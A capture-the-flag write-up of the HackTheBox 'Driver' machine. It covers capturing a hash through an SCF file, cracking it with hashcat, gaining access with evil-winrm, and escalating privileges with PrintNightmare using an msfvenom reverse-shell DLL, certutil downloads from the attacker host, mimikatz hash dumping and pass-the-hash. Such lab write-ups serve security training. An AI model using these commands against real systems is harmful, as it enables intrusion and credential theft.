Hackthebox — Driver Writeup
Hackthebox — Driver Writeup
Proceed with an Nmap scan on the target machine
nmap -A -sV -p- 10.10.11.106
Lets try accessing shares over smb. Anonymous login isn’t enabled on this machine.
smbclient -L \\\\10.10.11.106\\
Now, enumerate the web server which brings up to a login prompt from “MFP Firmware Update Center”, so I tried to search up default credentials!
I didn’t end up finding any default credentials for this login but, “admin:admin” worked. Now, navigating this website, I find an upload directory that is named “fw_us.php”.
I tried uploading a shell to to the website, and modifying the request in Burp Suite to exploit a file upload vulnerability but nothing worked for me. After hours of finding a different methodology, I tried an SCF(Shell Command Files) file attack.
[Shell]
Command=2
IconFile=\\10.10.14.4\share\random.ico
[Taskbar]
Command=ToggleDesktop
Labeling this file above @test.scf is important because it will put this to the top of the directory so an user can execute this. Then we can use responder to capture an hash if this box is vulnerable to an SCF file attack.
responder -wrf -I tun0
Upload the “@test.scf” file to the website and you’ll see captured hashes in responder!
As you see, this is an NTLM hash, so we can crack this using hashcat
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt — Password is cracked!!!
Since the port 5985 is open we can authenticate with evil-winrm
evil-winrm -u Tony -p liltony -i driver.htb
Privilege Escalation
whoami /priv
We don’t see any privilege’s that we can use to escalate our privileges. Since we know they had a printer website, most likely they should have a print spooler service.
Get-Service -Name Spooler
Since there is a printer service, we can try printnightmare, a new exploit :)
certutil.exe -urlcache -f http://10.10.14.4:8000/CVE-2021–1675.ps1 nightmare.ps1
.\nightmare.ps1
Oh no, we cannot execute scripts on this evil-winrm shell :( . I also tried using a meterpreter shell but whenever I loaded the script the shell would crash so I tried using an impacket tool called smbserver.py.
msfvenom -p windows/shell/reverse_tcp lhost=10.10.14.4 lport=9999 -f dll > rev.dll
Change your config then listen on an smbserver (/etc/samba/smb.conf)
[global]
client min protocol = CORE
client max protocol = SMB3
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445[smb]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = smbuser
python3 CVE-2021–1675.py driver.htb/tony:liltony@10.10.11.106 ‘\\10.10.14.4\smb\venom.dll’
nc -lvnp 9999
certutil.exe -urlcache -f http://10.10.14.4:8000/mimikatz.exe mimikatz.exe
mimikatz.exe
Now we can dump hashes using mimikatz
lsadump::sam
We can use this administrator hash to test if this box is vulnerable to a pass the hash attack using evil-winrm
evil-winrm -u administrator -H d1256cff8b5b5fdb8c327d3b6c3f5017 -i 10.10.11.106
Now, we successfully exploited the box!!! :)
Comments
Post a Comment